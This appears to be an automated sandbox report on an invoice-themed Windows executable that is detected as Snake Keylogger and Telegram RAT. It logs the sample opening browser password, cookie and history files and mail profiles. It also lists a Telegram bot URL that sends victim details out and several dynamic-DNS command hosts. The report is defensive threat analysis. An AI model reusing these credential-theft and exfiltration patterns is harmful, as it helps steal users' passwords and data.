Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe

Code function: 0_2_00405B89 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405B89

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.2965290125.00000000214A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 7524, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match	File source: 00000006.00000002.2965290125.00000000215A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 7524, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.2965290125.00000000214A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 7524, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Obfuscated Files or Information	1 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	311 Process Injection	1 Software Packing	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	21 Virtualization/Sandbox Evasion	LSA Secrets	21 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	311 Process Injection	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Invoice Pending Payment.exe	24%	ReversingLabs	Win32.Trojan.Generic
Invoice Pending Payment.exe	29%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nssAB11.tmp\nsExec.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nssAB11.tmp\nsExec.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Invoice Pending Payment.exe	24%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Invoice Pending Payment.exe	29%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.186.46	true	false	high
drive.usercontent.google.com	142.250.181.225	true	false	high
reallyfreegeoip.org	104.21.32.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	158.101.44.242	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2024/02/2025%20/%2022:29:47%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
http://checkip.dyndns.org/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://duckduckgo.com/chrome_newtab	msiexec.exe, 00000006.00000002.2966930577.000000002276B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/X	msiexec.exe, 00000006.00000002.2965290125.0000000021682000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	msiexec.exe, 00000006.00000002.2966930577.000000002276B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	msiexec.exe, 00000006.00000002.2965290125.0000000021584000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	msiexec.exe, 00000006.00000002.2965290125.0000000021584000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20a	msiexec.exe, 00000006.00000002.2965290125.0000000021584000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000001.00000002.2078400803.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	msiexec.exe, 00000006.00000002.2966930577.000000002276B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	msiexec.exe, 00000006.00000002.2965290125.00000000215A8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.000000002276B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.000000002271D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.0000000022820000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.00000000225C7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.0000000022579000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.00000000225EE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	msiexec.exe, 00000006.00000002.2965290125.0000000021660000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2965290125.0000000021651000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2965290125.0000000021691000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	msiexec.exe, 00000006.00000002.2965290125.00000000214A1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/lBdq	msiexec.exe, 00000006.00000002.2965290125.000000002168C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com	msiexec.exe, 00000006.00000003.2224427665.000000000589D000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/	msiexec.exe, 00000006.00000002.2952367265.00000000057EA000.00000004.00000020.00020000.00000000.sdmp	false	high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	msiexec.exe, 00000006.00000002.2966930577.00000000225C9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.0000000022554000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.00000000227FB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.00000000226F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.0000000022723000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.000000002257F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	msiexec.exe, 00000006.00000002.2966930577.000000002276B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000001.00000002.2078400803.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2078400803.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://apis.google.com	msiexec.exe, 00000006.00000003.2224427665.000000000589D000.00000004.00000020.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2073953654.0000000004C21000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2965290125.00000000214A1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enX	msiexec.exe, 00000006.00000002.2965290125.0000000021651000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	msiexec.exe, 00000006.00000002.2965290125.00000000214ED000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/	msiexec.exe, 00000006.00000002.2965290125.0000000021691000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.2078400803.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000001.00000002.2073953654.0000000004D75000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	msiexec.exe, 00000006.00000002.2966930577.000000002276B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.2073953654.0000000004D75000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000001.00000002.2073953654.0000000004D75000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.2073953654.0000000004D75000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000001.00000002.2078400803.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	msiexec.exe, 00000006.00000002.2966930577.000000002276B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/	msiexec.exe, 00000006.00000003.2263344793.0000000005896000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2263245757.000000000585A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2952367265.0000000005858000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	msiexec.exe, 00000006.00000002.2965290125.00000000214A1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en4	msiexec.exe, 00000006.00000002.2965290125.0000000021660000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	msiexec.exe, 00000006.00000002.2965290125.00000000215A8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.000000002276B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.000000002271D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.0000000022820000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.00000000225C7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.0000000022579000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.00000000225EE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	Invoice Pending Payment.exe, Invoice Pending Payment.exe.1.dr	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	msiexec.exe, 00000006.00000002.2965290125.0000000021584000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	msiexec.exe, 00000006.00000002.2966930577.000000002276B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.2073953654.0000000004D75000.00000004.00000800.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	msiexec.exe, 00000006.00000002.2965290125.00000000214A1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	msiexec.exe, 00000006.00000002.2966930577.000000002276B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_Error	Invoice Pending Payment.exe, Invoice Pending Payment.exe.1.dr	false	high
https://chrome.google.com/webstore?hl=enlBdq	msiexec.exe, 00000006.00000002.2965290125.000000002165B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/4	msiexec.exe, 00000006.00000002.2965290125.0000000021691000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	msiexec.exe, 00000006.00000002.2965290125.00000000214A1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/pscore6lBdq	powershell.exe, 00000001.00000002.2073953654.0000000004C21000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000001.00000002.2073953654.0000000004D75000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	msiexec.exe, 00000006.00000002.2965290125.000000002155D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2965290125.0000000021584000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2965290125.0000000021518000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	msiexec.exe, 00000006.00000002.2965290125.000000002155D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2965290125.0000000021584000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2965290125.00000000214ED000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	msiexec.exe, 00000006.00000002.2966930577.00000000225C9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.0000000022554000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.00000000227FB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.00000000226F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.0000000022723000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.000000002257F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	msiexec.exe, 00000006.00000002.2966930577.000000002276B000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.46	drive.google.com	United States	15169	GOOGLEUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
142.250.181.225	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
104.21.32.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1622902
Start date and time:	2025-02-24 17:22:24 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Invoice Pending Payment.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/15@5/5
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 97% Number of executed functions: 150 Number of non-executed functions: 57
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.253.72
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msiexec.exe, PID 7524 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8140 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
11:23:20	API Interceptor	38x Sleep call for process: powershell.exe modified
11:24:16	API Interceptor	175866x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	PRUEBA 2.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	SKMINV_021820.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PO# 250060324.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Remittance Document.scr.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse
	DHL- CBJ520818836689.pdf.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Purchase Order WPO28029.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Shipping doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Shipping Doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	VGjI0Z6AiG.exe	Get hash	malicious	Unknown	Browse
	windowsupdate.exe.bin.exe	Get hash	malicious	Unknown	Browse
104.21.32.1	SFT20020117.exe	Get hash	malicious	FormBook	Browse	www.fz977.xyz/7p42/
	PO from tpc Type 34.1 34,2 35 Spec.js	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/k566/
	REQUEST FOR QUOTATION.exe	Get hash	malicious	FormBook	Browse	www.clouser.store/3r9x/
	PO 87877889X,pdf.Vbs.vbs	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/k566/
	http://projectlombok.org	Get hash	malicious	Unknown	Browse	projectlombok.org/
	(BBVA) SWIFT_consulta_de_operaciones 10-02-2025-PDF.exe	Get hash	malicious	FormBook	Browse	www.kdrqcyusevx.info/k7wl/
	SOA - Final Payment.exe	Get hash	malicious	FormBook	Browse	www.arryongro-nambe.live/ljgq/
	SOA-CAVER.exe	Get hash	malicious	FormBook	Browse	www.arryongro-nambe.live/ljgq/
	PO 564787YTSH.exe	Get hash	malicious	FormBook	Browse	www.fz977.xyz/406r/?AvfPLv6=wl5Nj3SJXS6GKn33CDD6HhAqZgINmZqHvejr4cyaljig9n9IuVxSUHCyJDl4Cu/tzA+kDqqkCxMkWFu0wkrrG4aGxN75si4Ma+LLK0X8cPPOW9ttkQ==&uF=ithpsd
	Proposed Residential Building at City Walk Phase 5.vbs	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/
158.101.44.242	DHL- CBJ520818836689.pdf.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Shipping Doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PO-264725.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
